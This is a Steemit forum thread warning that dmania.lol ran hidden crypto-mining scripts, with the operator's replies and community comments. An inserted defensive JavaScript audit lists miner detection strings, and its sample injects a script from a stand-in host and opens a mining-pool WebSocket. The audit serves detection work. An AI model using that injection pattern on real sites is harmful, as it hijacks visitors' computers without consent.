Security Warning: Dmania.lol is running mining scripts using your computer resources.

in #dmania · 7 years ago (edited)

Hey Again Steemitizens,


Edit after a day of this post being up, in fairness:

@zombee responded quickly and fairly decisively and has resolved this issue. Dmania.lol is no longer mining as noted below.

Here from the comments section below, is the result of this post:

zombee (65) · 7 hours ago
I have definitely not installed any mining script on dMania and the site wasn't compromised.
It makes absolutely no sense that I would run a mining script on a small website like dMania. The rewards for that would be almost zero and I would lose all trust of the users.
That would endanger the whole project and everything I have worked for the last 6 months.

The only way that is possible is that some third party library has included a mining script somewhere. I am going to investigate and check if it's true.
dMania uses a lot of libraries that could potentially include a mining script with a new update without my knowledge. That's the only possible explanation and could potentially happen to any website.

Update
Apparently there actually was a crypto miner running on dMania without my knowledge. It was probably included in some external library in one of the last updates. I have updated all external libraries and the miner is gone.

I want to clarify that I had nothing to do with this. Projects like dMania use hundreds of libraries. Those libraries can potentially include a miner in a new update. I am now checking the code for that before every update so that won't happen again.

Update 2

OK, looks like the problem is not resolved. Atm I have no idea what's going on and how the miner gets onto the website. I took down dMania to protect the users until I fix it. (dMania-bot is also down and won't upvote anything.)

dMania will be online again when the problem is resolved.


This is the original post body, before @zombee responded and the addition was made above this line:

You should know that dmania.lol is running crypto mining scripts when you visit their site. Because of the warning issued by my security software, I did not proceed into the site today. This is the first time I have received this warning on their site.

I am not accusing the site operators of mal-doing, but if they are mining surreptitiously, well that's pretty shady. It is possible however, they have been hacked and this script was maliciously injected.

Either way, when this same thing happened to steem.supply, there was massive public outcry when people found out. I feel this bears reporting now to the community as a result.

Yours in service,
@SirCork

Steem Witness #71

Founder @YouAreHOPE Foundation - Steem based, community fueled worldwide humanitarian aid charitable organization.

Founder @SteemStarNetwork 24/7 stream at the center of the steemiverse.


Please remember to cast your witness vote for @SirCork,
your charitable, irritable steem witness!


Can you please give more info on which module was adding the miner? Was it a npm module? What's the name? I want to dig deeper in this

Thanks for responding. We have many confirmations it IS mining from @themarkymark, @netuoso, @andybets, @drakos and myself.

Find it and kill it, would be my suggestion.

Dmania is useless. Why would I share my rewards with your platform when I can just post a meme directly to steemit?

Because there is a chance of a 40$ upvote from the bot that you can't get if you post directly to steemit. But take into consideration that only quality memes can get the votes, so you might want to post them to steemit after all. Your attitude is toxic, gtfo.

I find your reply to accra unpleasant and wrong. I too had wondered and now I know I must stay far from all posts using dmania, since you react so violently to a simple question. I suppose you are now going to flag me also...

@zombee does runicar really represent your attitude to questions being asked? I also think that responding this way, with sarcasm and flags, at the time you have just been found to be in the wrong, even if unwittingly, is not good marketing.

You really shouldn’t be using hundreds of libraries. It’s a bit wasteful from a resource standpoint, opens up the site to vulnerabilities, and makes updating a pain.

Thanks for the update. Crisis averted. Good work. Good response.

What virus software do you use? I'm impressed by that catch!

Cg

Avast as indicated in the screenshot. McAfee is already dead because the founder has transformed into a full-time shill. LOL

and you find out here? is making the corrections for this post, I think you should be more careful with this... thanks to the friend @ sirirk for such important information...

I appreciate your response and update @zombee, but can you also answer @heimindanger's question? Thanks

Here's my little 100% UV
THANKS for the Quick Response!

@sircork

U, MY GOOD SIR, ROCK!

Not buying it, what was it included with?

I am now checking the code for that before every update so that won't happen again.

Will you share some details! So other small operators who care about it can also try to avoid these hidden miners!!

I go with the library theory. It is not the first time I see something like this happen, especially with crypto-related sites. It is vital to have the proper security software installed for detecting this kind of thing.

we love you big chef. Let's vote for a party.

Damn @zombee after the bernie post one would think that you would make sure to keep a clean house. I think most DO THINK that you put that there knowingly too. This is not good. You're hurting your existence.

You need to refresh on Dmania.
It's the shanty town of steemit man.

The consensus of most users in these comments is that it's sloppy that it got there, but probably not intentional. That said, it is a case of trust but verify, so we'd still like to know what library and how to avoid this in other applications likely to be using the same libraries for this sort of steem connected site.
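The pre-update check discussed in this thread, sketched as an added example; it is not part of the original thread and not dMania's code. It compares a dependency or bundle before and after an update and reports newly referenced external hosts and common in-browser miner strings. The indicator list, the host allowlist and the sample sources are constructed assumptions, not details of this incident.

```javascript
// Illustrative indicators (assumed list, not taken from the dMania incident).
const MINER_INDICATORS = [
  /cryptonight/i,              // hash algorithm used by in-browser Monero miners
  /coinhive/i,                 // in-browser miner service that was widely abused
  /stratum\+(tcp|ssl):\/\//i,  // mining-pool protocol URI
];
const URL_RE = /\b(?:https?|wss?):\/\/([a-z0-9.-]+)/gi;

// Every host the source text refers to over http(s) or ws(s), sorted.
function externalHosts(text) {
  const hosts = new Set();
  for (const m of text.matchAll(URL_RE)) hosts.add(m[1].toLowerCase());
  return [...hosts].sort();
}

// Hosts that appear only in the updated version of a file.
function hostsAddedByUpdate(before, after) {
  const old = new Set(externalHosts(before));
  return externalHosts(after).filter((h) => !old.has(h));
}

// Findings for one file: miner strings plus hosts outside the allowlist.
function auditSource(name, text, allowedHosts) {
  const findings = [];
  for (const re of MINER_INDICATORS) {
    const m = text.match(re);
    if (m) findings.push({ file: name, kind: 'miner-indicator', detail: m[0] });
  }
  for (const host of externalHosts(text)) {
    const ok = allowedHosts.some((a) => host === a || host.endsWith('.' + a));
    if (!ok) findings.push({ file: name, kind: 'unlisted-host', detail: host });
  }
  return findings;
}

// Constructed sample: the same library file before and after an update.
const SAMPLE_BEFORE = 'fetch("https://api.example.org/v1/posts");';
const SAMPLE_AFTER = SAMPLE_BEFORE +
  'var s=document.createElement("script");s.src="https://cdn.miner.example/lib.js";' +
  'new WebSocket("wss://pool.miner.example/"); /* cryptonight worker */';

console.log(hostsAddedByUpdate(SAMPLE_BEFORE, SAMPLE_AFTER));
console.log(auditSource('lib.js', SAMPLE_AFTER, ['example.org']));
```

A string match is easy to evade with obfuscation, so the new-host diff is the more durable signal; a Content-Security-Policy restricting `script-src` and `connect-src` to the same allowlist enforces it in the browser.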

You're a good guy @sircock
lol kidding but I swear I thought that was your name at first glance.

And @netuoso you should be clear and let people know that you want @zombee to fail because you present an alternative on the meme creation front. Nothing wrong with wanting your competition to fail but you should be clear on that.

I second the latter paragraph on here. I love meme, reason why I prefer it as an alternative than any other shit posting. Writing on a daily basis without generating a return-of-effort is a soul-crushing experience. I don't care though who will dominate this meme arena as long as it is user-friendly and safe to use. Facebook on the other end is undergoing similar trust issue lately, Dmania should fix this shit because the competition is getting fierce day by day.

Modern-day interpretation to Plato's Allegory Of The Cave is badass.


Dmania probably got compromised and some hackers installed these mining scripts. I doubt they would start doing this without letting users know.

I tend to agree.

Yea, that's pretty awful!!

Another rogue witness that hath gone greedy?

hard to say. maybe so, maybe not, but they seem to be responding to the cry to undo it.

Thanks for the info. I tend to believe that they were hacked. With lower prices, I would imagine it would be harder to defend an attack. This dip has left a lot of sites vulnerable. Any update on steem.supply? I really liked their service. Thanks again for the post! Resteem

Steem.supply is clean. I vote for its operator as a witness myself, in part because of how he handled the pressure of being found with crypto mining scripts last year. The site is devoid of them now.

Thanks for the heads up @sircork! Super helpful

We must have a very good antivirus to get noticed about these. Yesterday I saw a niche way of phishing and made a post about it. Looks like this was introduced unknowingly, but more and more greedy hackers are now eying steem block chain for sure.

Upvoted and Resteemed! Helping get the message out there. Thanks!

there has been A LOT of crazy phishing and bad links/scams and this kinda stuff......thanks @sircork for the warning
for the amount of money that is being 'played' with and the decentralized nature of what most of us stand for then any potential hidden things should be known

GO TEAM GOOD! ;)
